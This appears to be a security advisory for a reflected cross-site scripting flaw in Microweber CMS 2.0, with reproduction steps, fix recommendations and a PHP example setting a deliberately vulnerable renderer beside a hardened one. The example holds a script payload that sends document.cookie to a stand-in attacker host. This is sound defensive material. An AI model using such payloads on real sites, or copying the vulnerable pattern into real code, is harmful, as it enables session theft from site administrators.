Microweber CMS
cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*
- <= 2.0
A reflected cross-site scripting vulnerability has been identified in Microweber CMS version 2.0. The issue resides in the 'id' parameter of the 'live_edit.module_settings' API endpoint, which is reflected into the response without adequate validation or output encoding. An attacker can therefore execute arbitrary JavaScript by placing a crafted payload in the URL. When an authenticated admin user opens such a URL, the injected script runs in that admin's browser session, potentially leading to session cookie theft or other actions performed with admin privileges.
Exploitation requires the victim to open an attacker-supplied URL (for example via a phishing link); the result is reflected cross-site scripting, where the attacker executes arbitrary JavaScript in the context of the affected user's session.
To reproduce this vulnerability, log in as an admin user and request the 'live_edit.module_settings' API endpoint with a script payload, such as a script tag containing JavaScript, in the 'id' parameter. Observe that the payload is returned unescaped in the response and that the browser executes it, confirming the cross-site scripting vulnerability.
It is recommended to validate the 'id' parameter with Laravel's input validation, rejecting any value outside the expected format; to escape the value with Laravel's 'e()' helper before rendering it; to restrict dynamically rendered values to a strict allowlist; and to apply a Content Security Policy header. Note that CSP reduces the impact of an XSS but does not remove the underlying flaw, so it complements rather than replaces the validation and escaping.
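The following PHP is an added illustration of the remediation described above; it is not Microweber's own code and does not reproduce the affected endpoint. It shows a vulnerable rendering pattern beside a hardened one that applies allowlist validation, output escaping with Laravel's 'e()' helper, and a CSP header. The function names, the query-array input and the module-id format are assumptions for the example; 'e()' is polyfilled with htmlspecialchars so the file also runs outside Laravel.

```php
<?php
// Added example (not Microweber's code) illustrating the advisory's remediation.
// Assumptions: input arrives as a query-string-shaped array; e() is Laravel's
// helper, polyfilled below with htmlspecialchars so this runs in plain PHP.

if (!function_exists('e')) {
    function e(?string $value, bool $doubleEncode = true): string
    {
        return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', $doubleEncode);
    }
}

// Vulnerable pattern: the raw 'id' parameter is concatenated into the markup,
// so a value such as "><script>...</script> closes the attribute and injects script.
function renderModuleSettingsVulnerable(array $query): string
{
    $id = $query['id'] ?? '';
    return '<div class="module-settings" data-id="' . $id . '">' . $id . '</div>';
}

// Step 1 of the fix: a strict allowlist of what a module id may look like
// (assumed format for the example). In a Laravel controller the same rule is
// $request->validate(['id' => ['required', 'regex:/^[A-Za-z0-9_-]{1,64}$/']]);
function validateModuleId(?string $id): ?string
{
    if ($id === null || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id)) {
        return null;
    }
    return $id;
}

// Step 2: escape on output even after validation (defence in depth).
function renderModuleSettingsHardened(array $query): string
{
    $id = validateModuleId($query['id'] ?? null);
    if ($id === null) {
        return '<div class="module-settings error">Invalid module id</div>';
    }
    return '<div class="module-settings" data-id="' . e($id) . '">' . e($id) . '</div>';
}

// Step 3: a CSP that forbids inline script limits what any remaining XSS can do.
function contentSecurityPolicyHeader(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

// Constructed payload for a local check; an illustration, not the advisory's payload.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

echo "vulnerable: ", renderModuleSettingsVulnerable(['id' => $payload]), "\n";
echo "hardened:   ", renderModuleSettingsHardened(['id' => $payload]), "\n";
echo "hardened:   ", renderModuleSettingsHardened(['id' => 'layout_header']), "\n";
echo "header:     ", contentSecurityPolicyHeader(), "\n";
```

Running the file shows the vulnerable renderer emitting the script tag verbatim, while the hardened renderer rejects the payload at validation; had a malformed value slipped past the allowlist, the e() call would still neutralise the quote and angle brackets. Under a web SAPI the CSP string would be sent with header() rather than echoed.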